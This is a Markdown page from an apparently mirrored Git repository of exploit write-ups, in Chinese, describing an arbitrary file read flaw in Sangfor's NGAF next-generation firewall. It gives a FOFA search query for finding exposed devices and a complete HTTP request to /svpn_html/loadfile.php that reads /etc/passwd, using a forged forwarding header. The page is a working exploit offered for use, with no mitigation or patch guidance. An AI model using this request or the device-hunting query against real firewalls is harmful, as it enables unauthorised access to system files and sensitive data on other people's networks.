admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-08 03:46:17 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/深信服/深信服下一代防火墙NGAF/深信服下一代防火墙NGAFloadfile存在任意文件读取漏洞.md

29 lines
1.2 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 深信服下一代防火墙NGAF loadfile存在任意文件读取漏洞
# 一、漏洞简介
深信服下一代防火墙NGAF专注网络边界安全效果通过应用丰富的安全创新防御技术和简单易用的产品设计理念不仅增强网络边界的安全检测与防控能力而且实现网络安全风险可视化展示与快速处置让组织网络边界安全建设更有效、更简单。该系统存在任意文件读取漏洞会造成敏感信息泄露。
# 二、影响版本
+ 深信服下一代防火墙NGAF
# 三、资产测绘
+ fofa`title="SANGFOR | NGAF"`
+ 特征
![1713458847916-2fa4ae06-c1c9-46aa-a7d9-4a41a36c3b74.png](./img/kJMEluyAHaF5_DOx/1713458847916-2fa4ae06-c1c9-46aa-a7d9-4a41a36c3b74-683282.png)
# 四、漏洞复现
```plain
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:
Accept: */*
Content-Type: application/x-www-form-urlencoded
y-forwarded-for: 127.0.0.1
```
![1713458879412-36bd7456-0731-4750-96b3-4ea1f5663bbb.png](./img/kJMEluyAHaF5_DOx/1713458879412-36bd7456-0731-4750-96b3-4ea1f5663bbb-103266.png)
> 更新: 2024-04-19 08:49:27
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xem61o3tiw39r3cr>
Reference in New Issue Copy Permalink